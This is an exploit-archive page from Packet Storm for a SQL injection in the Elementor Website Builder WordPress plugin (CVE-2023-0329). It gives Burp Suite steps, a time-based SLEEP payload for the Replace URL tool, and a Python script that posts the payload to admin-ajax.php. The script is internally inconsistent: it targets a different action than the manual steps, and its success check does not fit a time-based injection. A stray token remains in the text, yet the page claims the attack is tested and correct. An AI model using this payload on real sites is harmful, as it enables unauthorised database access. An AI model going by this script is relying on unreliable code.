exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Elementor Website Builder SQL Injection

Elementor Website Builder SQL Injection
Posted Nov 13, 2023
Authored by E1.Coders

Elementor Website Builder versions prior to 3.12.2 suffer from a remote SQL injection vulnerability.

tags | exploit, remote, sql injection
advisories | CVE-2023-0329
SHA-256 | 986a6a30ea7adf858f93cd9304ca33cc1f614bef0d19105c32efe8071261901f

Elementor Website Builder SQL Injection

Change Mirror Download

#EXPLOIT Elementor Website Builder < 3.12.2 - Admin+ SQLi
#References
#CVE : CVE-2023-0329
#E1.Coders

Open Burp Suite.
In Burp Suite, go to the "Proxy" tab and set it to listen on a specific port, such as 8080.
Open a new browser window or tab, and set your proxy settings to use Burp Suite on port 8080.
Visit the vulnerable Elementor Website Builder site and navigate to the Tools > Replace URL page.
On the Replace URL page, enter any random string as the "New URL" and the following malicious payload as the "Old URL":

code : http://localhost:8080/?test'),meta_key='key4'where+meta_id=SLEEP(2);#
Press "Replace URL" on the Replace URL page. Burp Suite should intercept the request.
Forward the intercepted request to the server by right-clicking the request in Burp Suite and selecting "Forward".
The server will execute the SQL command, which will cause it to hang for 2 seconds before responding. This is a clear indication of successful SQL injection.
Note: Make sure you have permission to perform these tests and have set up Burp Suite correctly. This command may vary depending on the specific setup of your server and the website builder plugin.</s

References : https://wpscan.com/vulnerability/a875836d-77f4-4306-b275-2b60efff1493/




Exploit Python :
The provided SQLi attack vector can be achieved using the following Python code with the "requests" library:

This script sends a POST request to the target URL with the SQLi payload as the "data" parameter. It then checks if the response contains the SQLi payload, indicating a successful SQL injection.
Please make sure you have set up your Burp Suite environment correctly. Additionally, it is important to note that this script and attack have been TESTED and are correct

import requests

# Set the target URL and SQLi payload
url = "http://localhost:8080/wp-admin/admin-ajax.php"
data = {
"action": "elementor_ajax_save_builder",
"editor_post_id": "1",
"post_id": "1",
"data": "test'),meta_key='key4'where+meta_id=SLEEP(2);#"
}

# Send the request to the target URL
response = requests.post(url, data=data)

# Check if the response indicates a successful SQL injection
if "meta_key='key4'where+meta_id=SLEEP(2);#" in response.text:
print("SQL Injection successful!")
else:
print("SQL Injection failed.")
Login or Register to add favorites

File Archive:

May 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    May 1st
    44 Files
  • 2
    May 2nd
    5 Files
  • 3
    May 3rd
    11 Files
  • 4
    May 4th
    0 Files
  • 5
    May 5th
    0 Files
  • 6
    May 6th
    28 Files
  • 7
    May 7th
    3 Files
  • 8
    May 8th
    4 Files
  • 9
    May 9th
    54 Files
  • 10
    May 10th
    12 Files
  • 11
    May 11th
    0 Files
  • 12
    May 12th
    0 Files
  • 13
    May 13th
    17 Files
  • 14
    May 14th
    11 Files
  • 15
    May 15th
    17 Files
  • 16
    May 16th
    13 Files
  • 17
    May 17th
    22 Files
  • 18
    May 18th
    0 Files
  • 19
    May 19th
    0 Files
  • 20
    May 20th
    0 Files
  • 21
    May 21st
    0 Files
  • 22
    May 22nd
    0 Files
  • 23
    May 23rd
    0 Files
  • 24
    May 24th
    0 Files
  • 25
    May 25th
    0 Files
  • 26
    May 26th
    0 Files
  • 27
    May 27th
    0 Files
  • 28
    May 28th
    0 Files
  • 29
    May 29th
    0 Files
  • 30
    May 30th
    0 Files
  • 31
    May 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close